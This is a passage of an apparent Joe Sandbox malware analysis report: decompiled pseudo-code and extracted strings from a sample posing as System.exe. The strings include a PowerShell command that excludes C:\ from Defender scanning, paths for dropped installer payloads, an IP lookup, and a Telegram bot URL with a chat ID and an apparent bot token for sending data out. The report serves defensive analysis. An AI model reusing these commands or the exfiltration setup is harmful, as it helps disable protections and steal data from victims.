				E00007FF67FF6E4C72C94(E00007FF67FF6E4C72C9C(E00007FF67FF6E4C7241C( *_t60, _t86)));
				_t95 = _t60;
				_t79 =  *_t60; // executed
				E00007FF67FF6E4C4E580(_t18, _t18, __edi, _t44, __esp, E00007FF67FF6E4C62528(_t60, _t60),  *_t60,  *_t60, _t60, _t86, _t96); // executed
				if (E00007FF67FF6E4C630AC(_t60) == 0) goto 0xe4c628e8;
				if (sil != 0) goto 0xe4c6289d;
				E00007FF67FF6E4C71CD4( *_t60,  *_t60, _t60);
				E00007FF67FF6E4C625E4(1, _t13);
				_t61 = _t60;
				if (E00007FF67FF6E4C630AC(_t61) == 0) goto 0xe4c628f0;
				if (_v24 != 0) goto 0xe4c628c1;
				return E00007FF67FF6E4C71CC4(_t79, 0, _t95);
			}

















                                                                                                                                                              0x7ff6e4c62760
                                                                                                                                                              0x7ff6e4c62760
                                                                                                                                                              0x7ff6e4c62760
                                                                                                                                                              0x7ff6e4c62760
                                                                                                                                                              0x7ff6e4c62760
                                                                                                                                                              0x7ff6e4c62760
                                                                                                                                                              0x7ff6e4c62764
                                                                                                                                                              0x7ff6e4c62769
                                                                                                                                                              0x7ff6e4c62774
                                                                                                                                                              0x7ff6e4c62779
                                                                                                                                                              0x7ff6e4c6277a
                                                                                                                                                              0x7ff6e4c6277b
                                                                                                                                                              0x7ff6e4c6277c
                                                                                                                                                              0x7ff6e4c62781
                                                                                                                                                              0x7ff6e4c62794
                                                                                                                                                              0x7ff6e4c6279b
                                                                                                                                                              0x7ff6e4c6279d
                                                                                                                                                              0x7ff6e4c627a0
                                                                                                                                                              0x7ff6e4c627a5
                                                                                                                                                              0x7ff6e4c627ac
                                                                                                                                                              0x7ff6e4c627b5
                                                                                                                                                              0x7ff6e4c627bd
                                                                                                                                                              0x7ff6e4c627bf
                                                                                                                                                              0x7ff6e4c627d7
                                                                                                                                                              0x7ff6e4c627de
                                                                                                                                                              0x7ff6e4c627e9
                                                                                                                                                              0x7ff6e4c627ec
                                                                                                                                                              0x7ff6e4c627f8
                                                                                                                                                              0x7ff6e4c627fd
                                                                                                                                                              0x7ff6e4c62807
                                                                                                                                                              0x7ff6e4c62809
                                                                                                                                                              0x7ff6e4c6280c
                                                                                                                                                              0x7ff6e4c62818
                                                                                                                                                              0x7ff6e4c62824
                                                                                                                                                              0x7ff6e4c62830
                                                                                                                                                              0x7ff6e4c62832
                                                                                                                                                              0x7ff6e4c62835
                                                                                                                                                              0x7ff6e4c6283b
                                                                                                                                                              0x7ff6e4c62844
                                                                                                                                                              0x7ff6e4c62850
                                                                                                                                                              0x7ff6e4c6285c
                                                                                                                                                              0x7ff6e4c62861
                                                                                                                                                              0x7ff6e4c62876
                                                                                                                                                              0x7ff6e4c6287b
                                                                                                                                                              0x7ff6e4c62881
                                                                                                                                                              0x7ff6e4c62883
                                                                                                                                                              0x7ff6e4c62891
                                                                                                                                                              0x7ff6e4c62896
                                                                                                                                                              0x7ff6e4c62898
                                                                                                                                                              0x7ff6e4c628a1
                                                                                                                                                              0x7ff6e4c628a6
                                                                                                                                                              0x7ff6e4c628b3
                                                                                                                                                              0x7ff6e4c628ba
                                                                                                                                                              0x7ff6e4c628d2

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ExceptionFilterUnhandled_invalid_parameter_noinfo
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 59578552-0
                                                                                                                                                              • Opcode ID: 00c3951b18b1fb283c987ff5d3340099e41a3d0037335d3c067782c2d7914a55
                                                                                                                                                              • Instruction ID: 84c48ecaba74460ad13969e817ef5181cbce8cc81f6f11e8831420c9673970e3
                                                                                                                                                              • Opcode Fuzzy Hash: 00c3951b18b1fb283c987ff5d3340099e41a3d0037335d3c067782c2d7914a55
                                                                                                                                                              • Instruction Fuzzy Hash: 1EE0EC2AEDD11382F6287B7648C62BC10B01F55F61F50427BE21DC32D2CD6F24A25A6F
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C4DD20 Relevance: 71.9, APIs: 8, Strings: 33, Instructions: 174networkfileCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              C-Code - Quality: 16%
                                                                                                                                                              			E00007FF67FF6E4C4DD20(void* __edx, long long __rbx, long long __rcx, intOrPtr* __r8, long long _a16) {
				signed int _v72;
				long long _v1136;
				long long _v1144;
				intOrPtr _v1160;
				void* _t15;
				void* _t17;
				signed long long _t25;
				signed long long _t26;
				intOrPtr _t40;
				void* _t45;
				long long _t51;

				_a16 = __rbx;
				_t46 = _t45 - 0x470;
				_t25 =  *0xe4ca90a0; // 0x1ae1b17e2973
				_t26 = _t25 ^ _t45 - 0x00000470;
				_v72 = _t26;
				_v1136 = __rcx;
				_v1144 = __r8;
				r13d = 0;
				_v1160 = r13d;
				r9d = 0;
				r8d = 0;
				__imp__InternetOpenA(); // executed
				if (_t26 != 0) goto 0xe4c4de0f;
				 *((long long*)(__rcx)) = _t51;
				 *((long long*)(__rcx + 0x10)) = _t51;
				 *((long long*)(__rcx + 0x18)) = 0xf;
				 *((intOrPtr*)(__rcx)) = r13b;
				_t40 =  *((intOrPtr*)(__r8 + 0x18));
				if (_t40 - 0x10 < 0) goto 0xe4c4ddd2;
				_t33 =  *__r8;
				if (_t40 + 1 - 0x1000 < 0) goto 0xe4c4ddcd;
				if ( *__r8 -  *((intOrPtr*)(_t33 - 8)) + 0xfffffff8 - 0x1f > 0) goto 0xe4c4dfd2;
				0xe4c623d0();
				 *((long long*)(__r8 + 0x10)) = _t51;
				 *((long long*)(__r8 + 0x18)) = 0xf;
				 *((char*)(__r8)) = 0;
				return E00007FF67FF6E4C623B0(_t15, _t17, _v72 ^ _t46);
			}














                                                                                                                                                              0x7ff6e4c4dd20
                                                                                                                                                              0x7ff6e4c4dd30
                                                                                                                                                              0x7ff6e4c4dd37
                                                                                                                                                              0x7ff6e4c4dd3e
                                                                                                                                                              0x7ff6e4c4dd41
                                                                                                                                                              0x7ff6e4c4dd51
                                                                                                                                                              0x7ff6e4c4dd56
                                                                                                                                                              0x7ff6e4c4dd5b
                                                                                                                                                              0x7ff6e4c4dd5e
                                                                                                                                                              0x7ff6e4c4dd63
                                                                                                                                                              0x7ff6e4c4dd66
                                                                                                                                                              0x7ff6e4c4dd74
                                                                                                                                                              0x7ff6e4c4dd80
                                                                                                                                                              0x7ff6e4c4dd86
                                                                                                                                                              0x7ff6e4c4dd89
                                                                                                                                                              0x7ff6e4c4dd8d
                                                                                                                                                              0x7ff6e4c4dd95
                                                                                                                                                              0x7ff6e4c4dd98
                                                                                                                                                              0x7ff6e4c4dda0
                                                                                                                                                              0x7ff6e4c4dda5
                                                                                                                                                              0x7ff6e4c4ddaf
                                                                                                                                                              0x7ff6e4c4ddc4
                                                                                                                                                              0x7ff6e4c4ddcd
                                                                                                                                                              0x7ff6e4c4ddd2
                                                                                                                                                              0x7ff6e4c4ddd6
                                                                                                                                                              0x7ff6e4c4dde1
                                                                                                                                                              0x7ff6e4c4de0e

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Internet$CloseHandle$Open_invalid_parameter_noinfo_noreturn$FileRead
                                                                                                                                                              • String ID: *$123$C:\ProgramData\Data$C:\ProgramData\Data\$C:\ProgramData\Data\*$C:\ProgramData\Data\GPU.zip$C:\ProgramData\MicrosoftNetwork$C:\ProgramData\MicrosoftNetwork\System.exe$C:\ProgramData\MicrosoftNetwork\System.exe$C:\ProgramData\Systemd$C:\ProgramData\Systemd\$C:\ProgramData\Systemd\*$C:\ProgramData\Systemd\CPU.zip$C:\ProgramData\Systemd\install.exe$C:\ProgramData\Systemd\install2.exe$C:\ProgramData\Systemd\install3.exe$C:\ProgramData\Systemd\install4.exe$C:\ProgramData\Systemd\install5.exe$C:\ProgramData\UpSys.exe$C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty $C:\ProgramData\check.txt$Caption$Data$Direct3DCreate9Ex$Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.174 YaBrowser/22.1.2.834 Yowser/2.5 Safari/537.36$SELECT * FROM Win32_VideoController$Systemd$WQL$\exe.lnk$d3d9.dll$powershell.exe$root\CIMV2$runas
                                                                                                                                                              • API String ID: 390992788-888773548
                                                                                                                                                              • Opcode ID: 5adc7e11a66d304b610aa09a53afbdd13eb1c894cbdce03377970dc51fa490e5
                                                                                                                                                              • Instruction ID: 2850921dc49ecdf0aaa097a5cad3cd65c1c95fc3c6e0b06e0d4e0c0e4104a891
                                                                                                                                                              • Opcode Fuzzy Hash: 5adc7e11a66d304b610aa09a53afbdd13eb1c894cbdce03377970dc51fa490e5
                                                                                                                                                              • Instruction Fuzzy Hash: 18718E3B618A8282EA209F25F58436A6771FB45FC8F405032DB8E43A95DF7EE495C709
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C4EEB0 Relevance: 39.0, APIs: 14, Strings: 8, Instructions: 500stringCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 40 7ff6e4c4eeb0-7ff6e4c4ef78 call 7ff6e4c62690 * 2 call 7ff6e4c4a9a0 call 7ff6e4c4dd20 call 7ff6e4c4dfe0 51 7ff6e4c4ef7a 40->51 52 7ff6e4c4efdf-7ff6e4c4f014 lstrcpyA GetComputerNameW 40->52 53 7ff6e4c4ef80-7ff6e4c4ef9e 51->53 54 7ff6e4c4f01a-7ff6e4c4f07b call 7ff6e4c4dc50 52->54 55 7ff6e4c4f09f-7ff6e4c4f0b0 52->55 57 7ff6e4c4efab-7ff6e4c4efb2 53->57 58 7ff6e4c4efa0-7ff6e4c4efa9 53->58 67 7ff6e4c4f082-7ff6e4c4f08a 54->67 56 7ff6e4c4f0b5-7ff6e4c4f130 call 7ff6e4c4a9a0 * 2 55->56 73 7ff6e4c4f132-7ff6e4c4f154 56->73 74 7ff6e4c4f1ae-7ff6e4c4f1c6 call 7ff6e4c4fa10 56->74 62 7ff6e4c4efc2-7ff6e4c4efc9 57->62 63 7ff6e4c4efb4-7ff6e4c4efc0 57->63 61 7ff6e4c4efd7-7ff6e4c4efdd 58->61 61->52 61->53 62->61 66 7ff6e4c4efcb-7ff6e4c4efd0 62->66 63->61 66->61 67->67 68 7ff6e4c4f08c-7ff6e4c4f09d call 7ff6e4c4a9a0 67->68 68->56 76 7ff6e4c4f156-7ff6e4c4f15d 73->76 77 7ff6e4c4f171 73->77 78 7ff6e4c4f1cb-7ff6e4c4f28a call 7ff6e4c4ab00 call 7ff6e4c4f820 call 7ff6e4c4ab00 call 7ff6e4c4f820 74->78 76->77 79 7ff6e4c4f15f-7ff6e4c4f162 76->79 80 7ff6e4c4f174-7ff6e4c4f1ac call 7ff6e4c64380 * 3 77->80 97 7ff6e4c4f28c-7ff6e4c4f29d 78->97 98 7ff6e4c4f2be-7ff6e4c4f2c6 78->98 83 7ff6e4c4f169-7ff6e4c4f16f 79->83 84 7ff6e4c4f164-7ff6e4c4f167 79->84 80->78 83->80 84->80 99 7ff6e4c4f2b8-7ff6e4c4f2bd call 7ff6e4c623d0 97->99 100 7ff6e4c4f29f-7ff6e4c4f2b2 97->100 101 7ff6e4c4f2c8-7ff6e4c4f2d9 98->101 102 7ff6e4c4f2f9-7ff6e4c4f311 98->102 99->98 100->99 103 7ff6e4c4f66e-7ff6e4c4f673 call 7ff6e4c6a5f8 100->103 105 7ff6e4c4f2db-7ff6e4c4f2ee 101->105 106 7ff6e4c4f2f4 call 7ff6e4c623d0 101->106 107 7ff6e4c4f313-7ff6e4c4f324 102->107 108 7ff6e4c4f345-7ff6e4c4f34d 102->108 112 7ff6e4c4f674-7ff6e4c4f679 call 7ff6e4c6a5f8 103->112 105->106 105->112 106->102 115 7ff6e4c4f326-7ff6e4c4f339 107->115 116 7ff6e4c4f33f-7ff6e4c4f344 call 7ff6e4c623d0 107->116 109 7ff6e4c4f34f-7ff6e4c4f360 108->109 110 7ff6e4c4f380-7ff6e4c4f399 108->110 117 7ff6e4c4f37b call 7ff6e4c623d0 109->117 118 7ff6e4c4f362-7ff6e4c4f375 109->118 119 7ff6e4c4f39b-7ff6e4c4f3ad 110->119 120 7ff6e4c4f3cd-7ff6e4c4f3e8 110->120 123 7ff6e4c4f67a-7ff6e4c4f67f call 7ff6e4c6a5f8 112->123 115->116 115->123 116->108 117->110 118->117 127 7ff6e4c4f680-7ff6e4c4f685 call 7ff6e4c6a5f8 118->127 129 7ff6e4c4f3c8 call 7ff6e4c623d0 119->129 130 7ff6e4c4f3af-7ff6e4c4f3c2 119->130 131 7ff6e4c4f3ea-7ff6e4c4f3fb 120->131 132 7ff6e4c4f41c-7ff6e4c4f424 120->132 123->127 138 7ff6e4c4f686-7ff6e4c4f68b call 7ff6e4c6a5f8 127->138 129->120 130->129 130->138 140 7ff6e4c4f3fd-7ff6e4c4f410 131->140 141 7ff6e4c4f416-7ff6e4c4f41b call 7ff6e4c623d0 131->141 135 7ff6e4c4f426-7ff6e4c4f438 132->135 136 7ff6e4c4f458-7ff6e4c4f48b 132->136 142 7ff6e4c4f43a-7ff6e4c4f44d 135->142 143 7ff6e4c4f453 call 7ff6e4c623d0 135->143 146 7ff6e4c4f48d-7ff6e4c4f49e 136->146 147 7ff6e4c4f4a0-7ff6e4c4f4c3 136->147 148 7ff6e4c4f68c-7ff6e4c4f691 call 7ff6e4c6a5f8 138->148 140->141 140->148 141->132 142->143 151 7ff6e4c4f692-7ff6e4c4f697 call 7ff6e4c6a5f8 142->151 143->136 154 7ff6e4c4f516-7ff6e4c4f53a call 7ff6e4c49e00 call 7ff6e4c4dd20 146->154 155 7ff6e4c4f4c5-7ff6e4c4f4cc 147->155 156 7ff6e4c4f4f1-7ff6e4c4f4f4 147->156 148->151 159 7ff6e4c4f698-7ff6e4c4f69d call 7ff6e4c41260 151->159 177 7ff6e4c4f53f-7ff6e4c4f547 154->177 155->159 160 7ff6e4c4f4d2-7ff6e4c4f4dd call 7ff6e4c623d8 155->160 163 7ff6e4c4f4f6-7ff6e4c4f4fb call 7ff6e4c623d8 156->163 164 7ff6e4c4f4fe-7ff6e4c4f512 call 7ff6e4c64380 156->164 176 7ff6e4c4f69e-7ff6e4c4f6a3 call 7ff6e4c6a5f8 159->176 178 7ff6e4c4f4e3-7ff6e4c4f4ef 160->178 179 7ff6e4c4f6a4-7ff6e4c4f6a9 call 7ff6e4c6a5f8 160->179 163->164 164->154 176->179 182 7ff6e4c4f57b-7ff6e4c4f583 177->182 183 7ff6e4c4f549-7ff6e4c4f55a 177->183 178->164 193 7ff6e4c4f6aa-7ff6e4c4f6af call 7ff6e4c6a5f8 179->193 184 7ff6e4c4f5b7-7ff6e4c4f5cd call 7ff6e4c623d0 * 2 182->184 185 7ff6e4c4f585-7ff6e4c4f597 182->185 188 7ff6e4c4f55c-7ff6e4c4f56f 183->188 189 7ff6e4c4f575-7ff6e4c4f57a call 7ff6e4c623d0 183->189 202 7ff6e4c4f5cf-7ff6e4c4f5dd 184->202 203 7ff6e4c4f601-7ff6e4c4f609 184->203 190 7ff6e4c4f599-7ff6e4c4f5ac 185->190 191 7ff6e4c4f5b2 call 7ff6e4c623d0 185->191 188->176 188->189 189->182 190->179 190->191 191->184 204 7ff6e4c4f5f8-7ff6e4c4f600 call 7ff6e4c623d0 202->204 205 7ff6e4c4f5df-7ff6e4c4f5f2 202->205 206 7ff6e4c4f60b-7ff6e4c4f61c 203->206 207 7ff6e4c4f638-7ff6e4c4f667 call 7ff6e4c623b0 203->207 204->203 205->193 205->204 208 7ff6e4c4f633 call 7ff6e4c623d0 206->208 209 7ff6e4c4f61e-7ff6e4c4f631 206->209 208->207 209->208 212 7ff6e4c4f668-7ff6e4c4f66d call 7ff6e4c6a5f8 209->212 212->103
                                                                                                                                                              C-Code - Quality: 25%
                                                                                                                                                              			E00007FF67FF6E4C4EEB0(void* __ebx, void* __esi, void* __eflags, long long __rbx, long long __rdi, long long __rsi, void* __r8) {
				void* __rbp;
				void* __r13;
				void* __r15;
				void* _t176;
				int _t179;
				void* _t192;
				void* _t195;
				void* _t196;
				signed long long _t253;
				signed long long _t254;
				char* _t266;
				char* _t267;
				long long _t294;
				long long _t311;
				void* _t315;
				intOrPtr _t316;
				WCHAR* _t323;
				void* _t353;
				long long _t354;
				intOrPtr _t384;
				intOrPtr _t387;
				intOrPtr _t390;
				intOrPtr _t393;
				intOrPtr _t396;
				intOrPtr _t399;
				intOrPtr _t402;
				void* _t405;
				intOrPtr _t408;
				intOrPtr _t411;
				intOrPtr _t416;
				long long _t425;
				long long _t432;
				void* _t434;
				char* _t435;
				void* _t437;
				signed long long _t438;
				intOrPtr _t445;
				void* _t457;
				void* _t459;
				intOrPtr _t460;
				WCHAR* _t462;
				long long _t463;
				signed long long _t464;
				CHAR* _t466;

				_t425 = __rsi;
				_t311 = __rbx;
				 *((long long*)(_t437 + 8)) = __rbx;
				 *((long long*)(_t437 + 0x10)) = __rsi;
				 *((long long*)(_t437 + 0x18)) = __rdi;
				_t435 = _t437 - 0x3e0;
				_t438 = _t437 - 0x4e0;
				_t253 =  *0xe4ca90a0; // 0x1ae1b17e2973
				_t254 = _t253 ^ _t438;
				 *(_t435 + 0x3d0) = _t254;
				 *((intOrPtr*)(__rbx + 0x4de7ba000000400)) =  *((intOrPtr*)(__rbx + 0x4de7ba000000400)) + _t195;
				 *(_t435 - 0x30) = _t254;
				 *((intOrPtr*)(_t254 - 0x75)) =  *((intOrPtr*)(_t254 - 0x75)) + _t195;
				asm("lock dec eax");
				 *((long long*)(_t435 - 0x70)) = 0;
				 *((long long*)(_t435 - 0x60)) = 0;
				 *((long long*)(_t435 - 0x58)) = 0xf;
				r8d = 0x16;
				E00007FF67FF6E4C4A9A0(_t435 - 0x70, "https://api.ipify.org/", __r8);
				E00007FF67FF6E4C4DD20(_t196, __rbx, _t435 + 0x48, _t435 - 0x70); // executed
				_t323 = _t462; // executed
				_t176 = E00007FF67FF6E4C4DFE0(_t311, _t323, __rsi); // executed
				asm("movdqa xmm0, [0x51b6f]");
				asm("movdqu [esp+0x50], xmm0");
				r9d = _t176;
				 *((long long*)(_t438 + 0x54)) = _t311;
				 *(_t438 + 0x58) = _t323;
				 *((long long*)(_t438 + 0x5c)) = 1;
				r8d = 0x80000000;
				if (_t176 - r8d < 0) goto 0xe4c4efdf;
				asm("o16 nop [eax+eax]");
				asm("cpuid");
				 *((long long*)(_t438 + 0x50)) = 0x80000000;
				 *((long long*)(_t438 + 0x54)) = _t311;
				 *(_t438 + 0x58) = 0;
				 *((long long*)(_t438 + 0x5c)) = 1;
				if (r8d != 0x80000002) goto 0xe4c4efab;
				asm("movups xmm0, [esp+0x50]");
				asm("movaps [ebp+0x70], xmm0");
				goto 0xe4c4efd7;
				if (r8d != 0x80000003) goto 0xe4c4efc2;
				asm("movups xmm0, [esp+0x50]");
				asm("movaps [ebp+0x80], xmm0");
				goto 0xe4c4efd7;
				if (r8d != 0x80000004) goto 0xe4c4efd7;
				asm("movups xmm0, [esp+0x50]");
				asm("movaps [ebp+0x90], xmm0");
				r8d = r8d + 1;
				if (r8d - r9d <= 0) goto 0xe4c4ef80;
				lstrcpyA(_t466);
				_t313 =  >=  ?  *((void*)(_t435 + 0x48)) : _t435 + 0x48;
				 *((long long*)(_t435 + 0x40)) = 0x104;
				_t179 = GetComputerNameW(_t462);
				if (0x80000000 == 0) goto 0xe4c4f09f;
				 *((long long*)(_t438 + 0x48)) =  >=  ?  *((void*)(_t435 + 0x48)) : _t435 + 0x48;
				 *((long long*)(_t438 + 0x40)) = 0xe4ca0aa8;
				 *(_t438 + 0x38) = _t462;
				 *((long long*)(_t438 + 0x30)) = 0xe4ca0aa8;
				 *((long long*)(_t438 + 0x28)) = _t425;
				 *((long long*)(_t438 + 0x20)) = 0xe4ca0aa8;
				 *0xe4ca0aa8 =  *0xe4ca0aa8 + _t179;
				asm("repne jmp 0x2");
				 *((long long*)("C:\\ProgramData\\Systemd\\install4.exe")) =  *((long long*)("C:\\ProgramData\\Systemd\\install4.exe")) - 1;
				if (0x80000000 < 0) goto 0xe4c4f086;
				if (0x80000000 < 0) goto 0xe4c4f0ac;
				 *(_t435 - 0x80) = 0;
				 *((long long*)(_t435 - 0x78)) = 0xf;
				 *((char*)(_t438 + 0x70)) = 0;
				if ( *((char*)(_t435 + 0xaf)) != 0) goto 0xe4c4f082;
				E00007FF67FF6E4C4A9A0(_t438 + 0x70, _t435 + 0xb0, 0);
				goto 0xe4c4f0b5;
				 *((long long*)(_t438 + 0x70)) = 0;
				 *(_t435 - 0x80) = 0;
				 *((long long*)(_t435 - 0x78)) = 0xf;
				 *((char*)(_t438 + 0x70)) = 0;
				 *((long long*)(_t435 - 0x70)) = 0;
				 *((long long*)(_t435 - 0x60)) = 0;
				 *((long long*)(_t435 - 0x58)) = 0xf;
				 *((char*)(_t435 - 0x70)) = 0;
				r8d = 0xa;
				E00007FF67FF6E4C4A9A0(_t435 - 0x70, "1327052997", 0);
				 *((long long*)(_t438 + 0x50)) = 0;
				 *((long long*)(_t438 + 0x60)) = 0;
				 *((long long*)(_t438 + 0x68)) = 0xf;
				 *((char*)(_t438 + 0x50)) = 0;
				r8d = 0x2e;
				E00007FF67FF6E4C4A9A0(_t438 + 0x50, "5468819057:AAHRJabfvGnrMiNkuZj9RaE8-OjfRBxOw-4", 0);
				_t445 =  *((intOrPtr*)(_t438 + 0x60));
				r15d = 0x1c;
				_t463 = "https://api.telegram.org/bot";
				if ( *((intOrPtr*)(_t438 + 0x68)) - _t445 - _t466 < 0) goto 0xe4c4f1ae;
				 *((long long*)(_t438 + 0x60)) = _t445 + 0x1c;
				_t315 =  >=  ?  *((void*)(_t438 + 0x50)) : _t438 + 0x50;
				if (0xe4ca0aa4 - _t315 <= 0) goto 0xe4c4f171;
				if (_t463 - _t315 + _t445 > 0) goto 0xe4c4f171;
				if (_t315 - _t463 > 0) goto 0xe4c4f169;
				goto 0xe4c4f174;
				goto 0xe4c4f174;
				E00007FF67FF6E4C64380();
				E00007FF67FF6E4C64380();
				E00007FF67FF6E4C64380();
				_t266 = _t438 + 0x50;
				goto 0xe4c4f1cb;
				 *((long long*)(_t438 + 0x28)) = _t466 - _t466;
				 *((long long*)(_t438 + 0x20)) = _t463;
				r9d = 0;
				r8d = 0;
				E00007FF67FF6E4C4FA10(_t438 + 0x50, _t466 - _t466, 0, _t435 + 0x1c0, _t459, _t466 - _t466);
				 *((long long*)(_t435 - 0x50)) = 0;
				 *((long long*)(_t435 - 0x40)) = 0;
				 *((long long*)(_t435 - 0x38)) = 0;
				asm("movups xmm0, [eax]");
				asm("movups [ebp-0x50], xmm0");
				asm("movups xmm1, [eax+0x10]");
				asm("movups [ebp-0x40], xmm1");
				 *((long long*)(_t266 + 0x10)) = 0;
				 *((long long*)(_t266 + 0x18)) = 0xf;
				 *_t266 = 0;
				r8d = 0x15;
				E00007FF67FF6E4C4AB00(_t315, _t435 - 0x50, _t466, _t466 - _t466, _t459);
				asm("movups xmm0, [eax]");
				asm("movups [ebp-0x20], xmm0");
				asm("movups xmm1, [eax+0x10]");
				asm("movups [ebp-0x10], xmm1");
				 *((long long*)(_t266 + 0x10)) = 0;
				 *((long long*)(_t266 + 0x18)) = 0xf;
				 *_t266 = 0;
				E00007FF67FF6E4C4F820(_t315, _t435, _t435 - 0x20, _t435 - 0x70);
				_t267 = _t266;
				r8d = 6;
				E00007FF67FF6E4C4AB00(_t315, _t435, _t466, _t435 - 0x20, _t457);
				asm("movups xmm0, [eax]");
				asm("movups [ebp+0x20], xmm0");
				asm("movups xmm1, [eax+0x10]");
				asm("movups [ebp+0x30], xmm1");
				 *((long long*)(_t267 + 0x10)) = 0;
				 *((long long*)(_t267 + 0x18)) = 0xf;
				 *_t267 = 0;
				E00007FF67FF6E4C4F820(_t315, _t435 + 0x70, _t435 + 0x20, _t438 + 0x70);
				_t384 =  *((intOrPtr*)(_t435 + 0x38));
				if (_t384 - 0x10 < 0) goto 0xe4c4f2be;
				if (_t384 + 1 - 0x1000 < 0) goto 0xe4c4f2b8;
				if ( *((intOrPtr*)(_t435 + 0x20)) -  *((intOrPtr*)( *((intOrPtr*)(_t435 + 0x20)) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0xe4c4f66e;
				0xe4c623d0(_t434);
				_t387 =  *((intOrPtr*)(_t435 + 0x18));
				if (_t387 - 0x10 < 0) goto 0xe4c4f2f9;
				if (_t387 + 1 - 0x1000 < 0) goto 0xe4c4f2f4;
				if ( *_t435 -  *((intOrPtr*)( *_t435 - 8)) + 0xfffffff8 - 0x1f > 0) goto 0xe4c4f674;
				0xe4c623d0();
				 *((long long*)(_t435 + 0x10)) = 0;
				 *((long long*)(_t435 + 0x18)) = 0xf;
				 *_t435 = 0;
				_t390 =  *((intOrPtr*)(_t435 - 8));
				if (_t390 - 0x10 < 0) goto 0xe4c4f345;
				if (_t390 + 1 - 0x1000 < 0) goto 0xe4c4f33f;
				if ( *((intOrPtr*)(_t435 - 0x20)) -  *((intOrPtr*)( *((intOrPtr*)(_t435 - 0x20)) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0xe4c4f67a;
				0xe4c623d0();
				_t393 =  *((intOrPtr*)(_t435 - 0x38));
				if (_t393 - 0x10 < 0) goto 0xe4c4f380;
				if (_t393 + 1 - 0x1000 < 0) goto 0xe4c4f37b;
				if ( *((intOrPtr*)(_t435 - 0x50)) -  *((intOrPtr*)( *((intOrPtr*)(_t435 - 0x50)) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0xe4c4f680;
				0xe4c623d0();
				 *((long long*)(_t435 - 0x40)) = 0;
				 *((long long*)(_t435 - 0x38)) = 0xf;
				 *((char*)(_t435 - 0x50)) = 0;
				_t396 =  *((intOrPtr*)(_t438 + 0x68));
				if (_t396 - 0x10 < 0) goto 0xe4c4f3cd;
				if (_t396 + 1 - 0x1000 < 0) goto 0xe4c4f3c8;
				if ( *((intOrPtr*)(_t438 + 0x50)) -  *((intOrPtr*)( *((intOrPtr*)(_t438 + 0x50)) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0xe4c4f686;
				0xe4c623d0();
				 *((long long*)(_t438 + 0x60)) = 0;
				 *((long long*)(_t438 + 0x68)) = 0xf;
				 *((char*)(_t438 + 0x50)) = 0;
				_t399 =  *((intOrPtr*)(_t435 - 0x58));
				if (_t399 - 0x10 < 0) goto 0xe4c4f41c;
				if (_t399 + 1 - 0x1000 < 0) goto 0xe4c4f416;
				if ( *((intOrPtr*)(_t435 - 0x70)) -  *((intOrPtr*)( *((intOrPtr*)(_t435 - 0x70)) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0xe4c4f68c;
				0xe4c623d0();
				_t402 =  *((intOrPtr*)(_t435 - 0x78));
				if (_t402 - 0x10 < 0) goto 0xe4c4f458;
				if (_t402 + 1 - 0x1000 < 0) goto 0xe4c4f453;
				if ( *((intOrPtr*)(_t438 + 0x70)) -  *((intOrPtr*)( *((intOrPtr*)(_t438 + 0x70)) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0xe4c4f692;
				0xe4c623d0();
				 *((long long*)(_t438 + 0x70)) = 0;
				 *(_t435 - 0x80) = 0;
				 *((long long*)(_t435 - 0x78)) = 0;
				_t460 =  *((intOrPtr*)(_t435 + 0x88));
				r12b = _t460 - 0x10 >= 0;
				_t316 =  *((intOrPtr*)(_t435 + 0x70));
				_t469 =  >=  ? _t316 : _t435 + 0x70;
				_t464 =  *((intOrPtr*)(_t435 + 0x80));
